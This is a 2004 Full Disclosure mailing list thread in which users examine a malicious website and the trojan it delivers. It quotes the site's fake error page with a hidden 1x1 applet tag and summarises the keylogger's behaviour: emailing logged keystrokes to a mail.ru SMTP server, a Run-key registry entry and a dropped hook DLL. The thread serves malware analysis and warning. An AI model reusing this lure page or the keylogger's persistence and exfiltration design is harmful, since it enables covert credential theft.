Full Disclosure mailing list archives

Re: http://federalpolice.com:article872@1075686747

From: "first last" <randnut () hotmail com>
Date: Mon, 16 Feb 2004 00:12:54 +0000

That file is called TrojanSpy.Win32.Agent.d according to kaspersky (go towww.kaspersky.com and click online virus checker link orhttp://www.kaspersky.com/remoteviruschk.html).

No description from Kaspersky but I had a _very_ quick look at the unpackedcode, so it may do more:

- sends contents of <windir>\kgn.txt in an email to 194.67.23.10(smtp.mail.ru)

        - "MAIL FROM:<pentasatan () mail ru>\r\n"
        - "Subject: KeyLog from (%s)\r\n\r\n"

- writes path name to"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OLE"

- copies itself to windows dir
- extracts "HookerDll.Dll" from itself and copies it to windows dir

- probably will register the dll and make internet explorer load it eachtime it loads

I think it's the same programmer who wrote updatte. There's similar code anddata in it.

From: "Erik van Straten" <emvs.fd.3FB4D11C () cpo tn tudelft nl>

Hi Nicola,

It's not a zip file, not an applet, but a plain EXE file. Seems
compressed somehow, no time to figure it out now. Dunno why Mozilla
runs this (I don't like it).

If something showed up in your status bar, you should definitely assume
your box was compromised.

Take care out there,
Erik

On Sun, 15 Feb 2004 20:20:11 +0100 Nicola Fankhauser wrote:
> hi jedi
>
> On Sun, 2004-02-15 at 18:45, Jedi/Sector One wrote:
> >   This is equivalent to http://64.29.173.91/
>
> ok, and the html of the index page is as following:
>
> <html><body bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
> <h2>SERVER ERROR 550</h2>

> <applet ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1HEIGHT=1></applet></body></html>

>
> now, the "SERVER ERROR 550" is clearly a fake - the java applet below
> just starts fine. strangely, the 'javautil.zip' is not a valid zip-file,
> yet 'appletviewer' and mozilla (don't know about MS IE; too dangerous :)
> happily start the applet without any hickups or exceptions and mozilla
> states 'Applet BlackBox started' in the status bar.
>
> is there anybody knowledgable interested in un-zipping, de-compiling and
> analysing this surely malicious applet? I would like to know what
> mozilla just executed on my behalf there... :(
>
> FYI, the file 'javautil.zip' attached is directly taken from the site
> mentioned above.
>
> regards
> nicola
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_________________________________________________________________

Choose now from 4 levels of MSN Hotmail Extra Storage - no more accountoverload! http://click.atdmt.com/AVE/go/onm00200362ave/direct/01/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

Re: http://federalpolice.com:article872@1075686747 n . teusink (Feb 15)
- RE: Re: http://federalpolice.com:article872@1075686747 Aditya, ALD [Aditya Lalit Deshmukh] (Feb 16)
- <Possible follow-ups>
- RE: http://federalpolice.com:article872@1075686747 Remko Lodder (Feb 15)
- Re: http://federalpolice.com:article872@1075686747 first last (Feb 15)
- RE:http://federalpolice.com:article872@1075686747 Tom Koehler (Feb 16)
- Re: http://federalpolice.com:article872@1075686747 n . teusink (Feb 16)
  - Re: http://federalpolice.com:article872@1075686747 madsaxon (Feb 16)
- RE: Re: http://federalpolice.com:article872@1075686747 Nick Jacobsen (Feb 16)